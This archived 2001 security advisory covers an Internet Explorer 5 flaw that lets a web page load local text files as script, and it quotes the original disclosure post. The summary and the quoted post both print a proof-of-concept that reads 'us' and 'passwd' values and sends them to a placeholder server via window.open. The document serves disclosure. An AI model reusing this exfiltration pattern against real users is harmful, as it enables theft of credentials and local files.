Microsoft Internet Explorer Web Browser May Allow Remote Users to Read Some Text Files on the Browser's Hard Drive
|
Date: Jun 7 2001 18:38 (UTC/GMT)
|
Impact: Disclosure of system information, Disclosure of user information
|
Exploit Included: Yes
|
Version(s): Internet Explorer 5
|
Description: A vulnerability has been reported in Microsoft's Internet Explorer web browser that may allow remote users to read some textfiles on the browser's hard drive.
If a remote user creates a web page or sends an HTML-based e-mail with the following tag, some data from the "test.txt" file may
be read by the remote user:
<script src=" <file:///C:/WINNT/test.txt>
file:///C:/WINNT/test.txt"></script>
If there is,
for example, a text file named "test.txt" in the directory 'C:\WINNT' with the following contents, the HTML page will reportedly
consider the "test.txt" file as a script and the contents "us" and "passwd" will be considered as variables:
us="stefaan"
passwd="mypasswd"
As
a result, the information can potentially be returned to the web server using a script such as the following one:
<script>
//alert(passwd)
window.open(" <http://myurl/myasppage.asp?us>
http://myurl/myasppage.asp?us=" + escape(us) + ";passwd=" + escape(passwd),
"blabla")
</script>
|
Impact: A remote user may be able to access the content of certain files on the hard drive of the target web browser, depending on the content of the files.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.microsoft.com/technet/security/ (Links to External Site)
|
Cause: State error
|
Underlying OS: Windows (Me), Windows (NT), Windows (95), Windows (98), Windows (2000)
|
Reported By: Stefaan Deman <Stefaan.Deman@compex.be>
|
Message History:
This archive entry has one or more follow-up message(s) listed below.
|
Source Message Contents
|
Date: Wed, 6 Jun 2001 10:26:36 +0200
From: Stefaan Deman <Stefaan.Deman@compex.be>
Subject: security bug Internet Explorer 5
|
There is a security bug in the Internet Explorer 5 (I haven't tested it on
other browsers).
It is possible to read some textfiles (others than cookies) from the
client's hard disk.
If there is for example in the directory 'C:\WINNT' a textfile 'test.txt'
with content:
us="stefaan"
passwd="mypasswd"
then it is possible to read this file in an HTML page with the tag:
<script src=" <file:///C:/WINNT/test.txt>
file:///C:/WINNT/test.txt"></script>
The HTML page will consider the file as a script and us and passwd will be
considered as variables
in the previous example.
It is then possible to use this information or send this (possible critical)
information back to the
webserver with for example
<script>
//alert(passwd)
window.open(" <http://myurl/myasppage.asp?us>
http://myurl/myasppage.asp?us=" + escape(us) + ";passwd=" + escape(passwd),
"blabla")
</script>
This is a security bug, it should be impossible to read any file on the
client's file system.
Of course the file should have a correct JavaScript or VBscript syntax and
the filename should be known.
However, it is easy to image how this security hole can be misused.
This bug isn't as severe as the one posted by Guninski (
<http://www.guninski.com/scractx.html>
http://www.guninski.com/scractx.html).
The difference between this bug and the one of Guninski is that this
security hole doesn't make use of
Active X components.
Stefaan Deman
|
|
